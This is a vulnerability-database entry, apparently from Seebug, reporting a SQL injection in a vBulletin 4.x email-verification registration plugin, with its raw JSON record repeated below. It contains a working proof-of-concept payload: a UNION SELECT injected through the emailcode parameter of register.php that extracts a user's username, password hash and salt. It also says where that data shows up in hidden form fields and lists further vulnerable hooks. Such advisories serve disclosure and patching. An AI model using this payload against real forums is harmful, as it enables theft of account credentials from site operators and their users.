Search...

vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection

2014-11-13T00:00:00

ID SSV:87387
Type seebug
Reporter Root
Modified 2014-11-13T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
#Author: Dave (FW/FG)
 
The vulnerability resides in the register_form_complete hook, and some 
other hooks.
The POST/GET data is not sanitized before being used in queries.
 
SQL injection at:
http://example.com/register.php?so=1&amp;emailcode=[sqli]
 
PoC:
http://example.com/register.php?so=1&amp;emailcode=1' UNION SELECT null, 
concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM 
user WHERE userid = '1
 
Now look at the source of the page and find:
&lt;input type=&quot;text&quot; style=&quot;display: none&quot; name=&quot;email&quot; id=&quot;email&quot; 
maxlength=&quot;50&quot; value=&quot;[DATA IS HERE]&quot; dir=&quot;ltr&quot; tabindex=&quot;1&quot;&gt;
&lt;input type=&quot;text&quot; style=&quot;display: none&quot; name=&quot;emailconfirm&quot; id=&quot;email&quot; 
maxlength=&quot;50&quot; value=&quot;[DATA IS HERE]&quot; dir=&quot;ltr&quot; tabindex=&quot;1&quot;&gt;
 
Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change 
your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)

JSON Vulners Source

Initial Source

{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 0, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T13:10:04"}, "dependencies": {"references": [], "modified": "2017-11-19T13:10:04"}, "vulnersScore": 0.6}, "reporter": "Root", "title": "vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection", "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87387", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-11-13T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-87387", "history": [], "id": "SSV:87387", "status": "poc", "lastseen": "2017-11-19T13:10:04", "sourceData": "\n #Title: vBulletin Verify Email Before Registration Plugin - SQL Injection\r\n#Date: September 19 2014\r\n#Version: Any vBulletin 4.*.* version which has the plugin installed.\r\n#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164\r\n#Author: Dave (FW/FG)\r\n \r\nThe vulnerability resides in the register_form_complete hook, and some \r\nother hooks.\r\nThe POST/GET data is not sanitized before being used in queries.\r\n \r\nSQL injection at:\r\nhttp://example.com/register.php?so=1&emailcode=[sqli]\r\n \r\nPoC:\r\nhttp://example.com/register.php?so=1&emailcode=1' UNION SELECT null, \r\nconcat(username,0x3a,password,0x3a,salt), null, null, null, null FROM \r\nuser WHERE userid = '1\r\n \r\nNow look at the source of the page and find:\r\n<input type="text" style="display: none" name="email" id="email" \r\nmaxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">\r\n<input type="text" style="display: none" name="emailconfirm" id="email" \r\nmaxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">\r\n \r\nVulnerable hooks:\r\nprofile_updatepassword_complete (Email field when you want to change \r\nyour email address after being logged in.)\r\nregister_addmember_complete (After submitting the final registration form.)\r\nregister_addmember_process\r\nregister_form_complete (This example)\r\nregister_start (Email confirmation form at register.php)\n ", "published": "2014-11-13T00:00:00"}